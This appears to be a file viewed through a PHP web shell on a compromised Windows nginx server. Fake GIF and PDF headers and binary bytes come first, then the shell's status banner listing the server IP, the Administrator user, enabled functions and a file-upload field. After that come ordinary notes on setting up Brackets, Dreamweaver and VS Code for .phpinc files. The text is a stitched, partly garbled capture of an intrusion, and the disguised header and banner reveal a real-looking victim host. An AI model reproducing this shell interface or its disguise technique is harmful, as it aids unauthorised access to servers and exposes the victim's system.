GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/site/_work/ |
Upload File : |
Brackets Configure Brackets to colorcode .phpinc files: Open the .phpinco file In the status bar (lower-right), click the dropdown that says "Text" Select the "PHP" option Open the dropdown again and select the "Set as Default" option at the top Open the C:\nginx\html folder when you run brackets. You can click on the Start icon and enter: brackets C:\nginx\html You can create a Brackets shortcut, edit the properties and add a space and C:\nginx\html to the Target. Dreamweaver: Configure Dreamweaver to colorcode .phpfiles: https://helpx.adobe.com/dreamweaver/kb/change-add-recognized-file-extensions.html Setup a site in Deamweaver: https://helpx.adobe.com/dreamweaver/how-to/define-a-dreamweaver-site.html Setup a remote site server in Deamweaver: https://helpx.adobe.com/dreamweaver/how-to/publish-manage-websites.html or https://helpx.adobe.com/dreamweaver/user-guide.html/dreamweaver/using/connect-remote-server.ug.html Visual Studio Code: Configure vscode to colorcode .phpinc files: Use ctrl-K M to open the language mode and select PHP for .phpinc files. Open the C:\nginx\html folder when you run vscode. Open the folder in File Explorer. Click on the location and enter cmd. Enter the command code . (note the dot) You can click on the Start icon and enter: code C:\nginx\html You can create a vscode shortcut, edit the properties and add a space and C:\nginx\html to the Target.